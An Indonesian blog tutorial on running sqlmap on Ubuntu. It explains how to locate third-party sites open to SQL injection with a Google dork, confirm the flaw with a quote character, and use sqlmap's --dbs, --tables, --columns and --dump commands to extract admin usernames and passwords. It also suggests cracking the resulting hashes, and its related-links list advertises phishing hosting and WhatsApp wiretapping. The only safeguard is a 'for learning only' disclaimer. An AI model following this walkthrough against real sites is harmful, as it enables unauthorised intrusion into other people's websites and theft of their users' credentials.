Bagaimana cara menggunakan sqlmap di linux ubuntu? Mungkin saat ini kamu ingin melakukan uji coba keamanan website kamu atau website teman, ingat artikel ini dibuat untuk bahan pembelajaran saja jadi apabila anda salah menggunakan tutorial ini itu sudah tidak tanggung jawab kami lagi.
Berbicara soal SQLMAP pastinya tidak jauh-jauh dari serangan SQL Injection yang bertujuan untuk menemukan kerentanan keamanan website menggunakan sqlmap. Dengan menggunakan sqlmap kita dapat menemukan beberapa informasi database seperti password dan username admin.
Melakukan Serangan SQL Injection pada umumnya ada banyak sekali caranya, bisa menggunakan sql injection manual, menggunakan tools dan jenis serangan sql injection pun ada banyak jenis-jenisnya, mulai dari In-band SQL Injection, Error-based SQLI , Union-based SQLI, Inferential SQL Injection (Blind SQLI), setelah kamu sudah mengetahui jenis-jenis serangan sql injection.
Di artikel ini saya tidak akan membahas seluruh pengertian jenis-jenis serangan sql injection lebih dalam, apabila kamu mencari pengertian jenis-jenis serangan sql injection kamu bisa mencari informasinya melalui google, di artikel ini saya akan mengajarkan kamu cara menggunakan sqlmap di linux ubuntu.
Apa Itu SQLmap?
SQLmap adalah sebuah alat uji penetrasi open source yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan injeksi SQL dan mengambil alih database server. Tampil dengan mesin pendeteksi yang hebat, banyak fitur khusus untuk penguji penetrasi akhir dan berbagai switch yang bertahan dari database, melebihi pengambilan data dari database, untuk mengakses sistem berkas yang mendasarinya dan menjalankan perintah pada sistem operasi melalui sistem operasi out-of-band connections.
Cara Menggunakan SQLMap
Agar kita dapat menggunakan sqlmap untuk melakukan serangan sql injection pada suatu situs, langkah awal yang harus kamu siapkan. Kamu harus menginstall sqlmap di sistem operasi kamu, kamu bisa menginstall sqlmap di linux, windows dan sistem operasi lainya, kalau kamu menggunakan linux kamu bisa melihat cara install sqlmap di linux.
Kalau kamu sudah mempunyai alat sqlmap sekarang kita masuk ke topik utama artikel yaitu cara menggunakan sqlmap.
1. Cari Situs Yang Memiliki Bug SQL Injection
Tahap pertama hal yang harus kita lakukan, adalah mencari situs yang memiliki bug sql injection untuk mencari celah sql injection kita bisa memanfaatkan dork, dengan dork kita bisa menemukan daftar situs yang memiliki celah sql injection berikut cara menggunakan dork dan mencari bug sql injection menggunakan dork sql injection.
Dork SQL Injection: inurl:news.php?id= site:.com "2022"
Agar kamu dapat mencari situs yang memiliki celah sql injection kamu bisa menggunakan dork yang sudah saya berikan, sekarang kita sudah mempunyai dork dan daftar situs yang ingin kita uji coba keamanannya.
Contoh situs ini: https://www.demo.com/news.php?id=51
Nah untuk mengetahui apakah situs demo yang saya jadikan contoh ini memiliki celah sql injection apa tidak, kita bisa menambahkan tanda string di belakang angka dan menjadi seperti ini https://www.demo.com/news.php?id=51‘ String ( ‘ ) nantinya kamu akan menemukan notifikasi tampilan
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Di sini kita menemukan sebuah pesan “You have an error in your sql syntax, dan sekarang kita coba melakukan serangan sql injection, menggunakan sqlmap. Disini saya menggunakan sqlmap di linux ubuntu.
Untuk mengetahui seluruh perintah dasar di sqlmap kamu bisa menggunakan perintah dasar ” sqlmap -h ” dengan mengetikan perintah sqlmap -h kamu akan menemukan seluruh panduan perintah dasar pada alat sqlmap untuk lebih lengkapnya kamu bisa menggunakan perintah “sqlmap -hh“. Disini saya anggap kamu sudah paham seluruh perintah yang ada di sqlmap seperti –dbs, –tables, –dump, –users, dan –passwords.
2. Jalankan SQLMAP Dan Mulai Mencari Celah SQL Injection
Setelah kita sudah menemukan target yang ingin kita uji coba, sekarang kita jalankan sqlmap dan mulai mencari celah sql injection pada situs-situs tertentu.
Ketikan di terminal linux dan ketikan perintah sebagai berikut.
Artikel Rekomendasi :
sqlmap -u https://www.demo.com/news.php?id=51 --dbs
Dan setelah kamu sudah memasukan perintah yang sudah saya sebutkan tadi kemudian tekan enter, dan sqlmap secara otomatis mencari bug sql injection kamu tinggal tunggu sampai proses nya selesai. Dan nantinya kamu juga akan menemukan informasi database mulai dari table, colum, user, dan password.
Contoh Output SQLMAP Di Terminal Linux:
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:11:39 /2022-07-19/
[08:11:40] [INFO] testing connection to the target URL
[08:11:43] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[08:11:43] [INFO] testing if the target URL content is stable
[08:11:44] [INFO] target URL content is stable
[08:11:44] [INFO] testing if GET parameter 'id' is dynamic
[08:11:45] [WARNING] GET parameter 'id' does not appear to be dynamic
[08:11:46] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:11:48] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:11:48] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
Nah untuk perintah lebih lanjut kamu bisa menggunakan beberapa perintah dibawah ini.
sqlmap -u https://www.demo.com/news.php?id=51 --tables -D (nama database) Perintah menemukan tabel di database tertentu.
sqlmap -u https://www.demo.com/news.php?id=51 --columns -D (nama database) -T user (Kalau kamu sudah memiliki daftar table database nya kamu bisa mencari informasi database user seperti username dan password, contoh saja kamu ingin mencari database user kamu bisa mengetikan perintah di atas.
sqlmap -u https://www.demo.com/news.php?id=51 --dump -D (Nama Database) -T user (perintah untuk mengambil data dari tabel dan mengeluarkan data sensitif seperti username dan password.
Nah setelah kita sudah menemukan username dan password nantinya kamu akan menemukan password dalam bentuk hash md5 atau jenis hash password lainnya. Untuk tools hash password kamu bisa menggunakan MD5 Online, Atau Tools JhonTheRipper atau hashcat.
Min kenapa tidak dilanjutkan? maaf saya tidak bisa melanjutkan menjalankan perintah di terminal, karena ini hanya sebatas pembelajaran saja… dan perlu kamu ketahui apabila kamu mempelajari tutorial ini, dan kamu mencoba mendapatkan informasi username dan password situs milik orang lain, itu bukan tanggung jawab kami lagi.
Rekomendasi:
- Mengenal Serangan SQL Injection Dan Cara Mencegahnya Serangan SQL Injection adalah salah satu bug web yang sering sekali di temukan serangan SQL Injection juga sering di luncurkan terhadap situs situs besar seperti pemerintah,lembaga,dan juga situs toko online.…
- Cara Download Video Fb Tanpa Aplikasi Di Android Yang Wajib… Facebook menjadi salah satu aplikasi yang dikembangkan serta dirilis pada tahun 2004. Para pengguna aplikasi yang satu ini dapt Anda gunakan untuk menonton video serta mengunduh video. Namun, Anda harus…
- Tools Keamanan Jaringan Di Kali Linux, Dan Sistem Operasi… Tools Keamanan Jaringan Di Kali Linux,Dan Sistem Operasi Berbasis Text Lainnya -Keamanan Jaringan merupakan hal yang sangat penting ditambah lagi kamu merupakan seorang anak jaringan. Di kali linux atau di…
- Terapkan Tips Ini Agar Kapasitas Penyimpanan Hosting Kamu… Kompirasi News - Bagi kamu yang membeli sebuah hosting yang penyimpanan nya kurang memadai atau tidak unlimited. Memang sangat bikin pusing. Ditambah lagi kamu banyak menyimpan file seperti gambar,video dan…
- Inilah Daftar Distro Linux Yang Paling Populer Di Kalangan… Inilah Daftar Distro Linux Yang Paling Populer Di Kalangan Ahli IT - Kali ini membahas seputar sistem operasi berbasis text sebenarnya apasih sistem operasi berbasis text,bagi kamu yang belum tahu…
- Cara Mudah Beli Hosting Terbaik untuk Phising Hosting terbaik untuk phising saat ini sudah mudah ditemukan. Sebelum membuat website, tentunya ada berbagai macam hal yang perlu dipersiapkan mulai dari domain hingga hosting yang bisa diketahui. Untuk saat…
- Proxysite: Cara Membuka Situs Yang Diblokir Menggunakan… Apa Itu Proxysite.com? Proxysite Adalah situs free proxy gratis yang dapat membantu pengguna internet untuk dapat mengakses situs web yang sudah diblokir pemerintah, dengan menggunakan proxysite anda dapat mengakses seluruh…
- 2 Cara Membuat User Baru Di Linux Ubuntu Cara Membuat User Baru Di Linux Ubuntu, Kompirasi.com - Waktu kita pertama kali meginstall sistem operasi ubuntu pastinya kita sudah mempunyai user default yang bernama root user. Dengan adanya user…
- Cara Mencari Bug WordPress Menggunakan Wpscan Bagaimana cara mencari bug wordpress menggunakan wpscan? Sebagai pengguna cms wordpress dan seorang admin web kita diwajibkan untuk memperhatikan keamanan blog wordpress yang kita miliki. Terutama dari segi keamanan wordpress…
- Cara Download Video Instagram Tanpa Aplikasi, Sangat Mudah! Ternyata download video instagram tanpa aplikasi sangat mudah. Bahkan, jauh lebih mudah dan efektif jika dibandingkan dengan menggunakan aplikasi tertentu. Sebab, Anda tidak perlu mendownload aplikasi untuk mendownload terlebih dahulu…
- Hosting Gratis Terbaik, Ini Pembahasan Lengkapnya Tidak perlu khawatir lagi, sekarang terdapat banyak hosting gratis terbaik. Kualitasnya telah dibuktikan oleh para pemilik website. Hanya saja saat memilih salah satu diantaranya Anda perlu memperhatikan sistem kinerja serta…
- Cara Install AnyDesk Di Linux Ubuntu Cara Install AnyDesk Di Linux Ubuntu - Jika kamu sebelumnya menggunakan teamviewer sebagai remote control jarak jauh, maka kamu dapat mencoba aplikasi yang dapat mengontrol komputer dengan jarak jauh. Aplikasi…
- Aplikasi Sadap Whatsapp Terbaru Untuk Pengguna Android Seputar Teknologi kali ini membahas bagaimana cara sadap whatsapp untuk para pengguna android kebanyakan orang mungkin tidak tahu bagaimana cara menyadap handphone nah kali ini admin akan merekomendasikan aplikasi sadap…
- Jual Beli Online Terpercaya dengan Buka Aplikasi Bukalapak Agar belanja lebih memuaskan, sebaiknya Anda buka aplikasi Bukalapak karena barang yang dibutuhkan tersedia secara lengkap di apk Bukalapak Indonesia ini. Apalagi transaksi yang dilakukan sangat aman dan tidak membuat penggunanya…
- User Aplikasi Faceindo Tidak Perlu Takut Karena Hacker Tidak… Baru baru ini situs resmi Faceindo di retas oleh hacker asal indonesia banyak kalangan pengguna yang resah akibat terjadinya peretasan di website resmi milik faceindo,dan banyak juga yang bertanya tanya…
- Inilah Jenis Jenis Serangan Jaringan Pada Komputer Kompirasi News -Serangan jaringan memang sangat sering terjadi di indonesia. Apalagi kalau kamu seorang anak Jaringan Komputer tentunya kamu harus memahami jenis jenis serangan jaringan atau juga teknik teknik yang…
- Cara Mengaktifkan Autentikasi Dua Faktor Discord Saat ini banyak pengguna discord yang tidak mengaktifkan autentikasi dua faktor discord padahal dengan kita mengaktifkan fitur ini, keamanan akun discord kita akan terjaga dan tentunya mampu memperkuat keamanan akun…
- 6 Cara Menghapus Jejak Digital Di Internet Mau tahu cara menghapus jejak digital di internet? Jejak digital menjadi hal yang sangat penting bagi pengguna internet, terutama sewaktu kita beraktifitas menggunakan komputer yang dimana pastinya seluruh aktifitas jejak…
- Cara Install VLC Media Player Di Ubuntu Bagaimana cara install VLC Media Player Di Ubuntu 22.04 LTS? Mendengar nama vlc media player pastinya sudah tidak asing lagi dengan software untuk memutar video dan lagu ini. Biasanya mungkin…
- Cara Rewrite Artikel Unik %100 Lolos Plagiarisme Content Sebagai seorang blogger pastinya kita memiliki masa-masa semangat menulis artikel (konten) untuk blog kita, agar pembaca dan pengujung blog kita mendapatkan update artikel terbaru dari blog yang sudah kita kelola.…
- Mengenal Perintah Dasar Sistem Operasi Linux Untuk Pemula Mengenal Perintah Dasar Sistem Operasi Linux Untuk Pemula - Kali ini saya ingin membahas seputar perintah linux,linux sendiri merupakan sistem operasi berbasis text yang di distribusikan secara bebas dan open source.…
- 6 Cara Download Story IG Tanpa Aplikasi Paling Mudah Anda harus tahu bahwa cara download story IG tanpa aplikasi sebenarnya itu sangat mudah setelah membaca artikel ini. Mungkin Anda pernah kena tag teman pada storynya, dari pada di-screenshot dengan…
- Inilah Hal Yang Akan Terjadi Apabila Server Website Kamu… Kompirasi News - Mungkin pengguna blogspot tidak akan pernah merasakan hal ini,resiko bagi para pengguna hosting unlimited atau apapun itu bisa menjadi faktor server website kamu down. Hal ini terjadi…
- Cara Install Laravel Di Xampp Untuk Pemula [Panduan Lengkap] Kali ini saya akan membahas bagaimana cara install laravel di xampp dan menggunakan sistem operasi windows 8 atau 10 di pc saya, untuk melakukan penginstalan laravel di xampp sangat mudah…
- Waspada Inilah Teknik Hacker Untuk Mencuri Informasi Akun… Waspada Inilah Teknik Hacker Untuk Mencuri Informasi Akun Bank Kamu - Membahas seputar hacker banyak nya pelaku peretasan atau yang di kenal pembobolan di dunia hacker memang sangat menjengkelkan apalagi kalau…
- Bahaya Serangan DNS Hijacking, Bahkan Situs Raksasa Sekelas… Membuat situs dengan keamanan super kuat memang menjadi salah satu tujuan utama bagi seorang yang mencintai bidang keamanan namun website sekuat apapun bisa di jebol dengan teknik yang satu ini.…
- Simak! Beberapa Cara Unduh Atau Cara Download Aplikasi… Instagram sendiri menjadi salah satu aplikasi yamg paling sering dimanfaatkan oleh masyarakat dari berbagai kalangan. Hal ini juga membuat ada banyak orang yang mencari berbagai cara unduh atau cara download…
- Cara Sadap WhatsApp Jarak Jauh Tanpa Mendownload Aplikasi Cara sadap WhatsApp jarak jauh tanpa mendownload aplikasi dapat dilakukan dengan mudah. Saat ini bermain media sosial memang menjadi salah satu aktivitas utama yang tidak dapat dihindari oleh masyarakat. Salah satunya…
- Perbandingan Adsterra Vs Google Adsense Sekarang ini banyak orang bisa mendapatkan uang dari blog atau website karena adanya jaringan periklanan global. Ada 2 jaringan periklanan yang sekarang ini tengah naik daun dan banyak digunakan orang…
- Inilah Hal Yang Harus Di Lakukan Apabila Situs Web Kamu… Kompirasi News - Membahas seputar tindakan kriminal yaitu peretasan mungkin kalian pernah mengalami situs website yang tindakan jahil seorang hacker sesuai judul kali ini yaitu. Inilah Hal Yang Harus Di…